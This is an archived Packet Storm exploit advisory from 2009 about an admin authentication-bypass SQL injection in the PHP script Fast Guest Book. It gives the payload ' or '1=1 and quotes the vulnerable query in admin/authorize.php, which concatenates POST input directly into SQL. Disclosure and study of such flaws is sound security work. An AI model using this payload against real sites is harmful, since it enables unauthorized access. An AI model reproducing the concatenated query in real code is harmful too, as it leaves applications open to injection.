Fast Guest Book SQL Injection

2009-01-12T00:00:00
ID PACKETSTORM:73729
Type packetstorm
Reporter Moudi
Modified 2009-01-12T00:00:00

Description

                                        
                                            `###########################################################################  
#-----------------------------I AM MUSLIM !!------------------------------#  
###########################################################################  
  
==============================================================================  
_ _ _ _ _ _   
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
  
==============================================================================  
Fast Guest Book (Auth Bypass) SQL Injection Vulnerability  
==============================================================================  
  
[»] Script: [ Fast Guest Book ]  
[»] Language: [ PHP ]  
[»] Website: [ http://fastcreators.com/products/guestbook/download.php ]  
[»] Founder: [ Moudi <m0udi@9.cn> ]  
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , and all hackers... ]  
[»] Team: [ EvilWay ]  
  
###########################################################################  
  
===[ Exploit ]===   
  
[»] ' or '1=1  
  
===[ BUG ]===   
  
[»] Bug In \admin\authorize.php  
  
$query = "select * from admin where userid='{$_POST['uname']}' AND  
pass='{$_POST['pass']}'";  
  
  
  
Author: Moudi  
  
###########################################################################  
  
`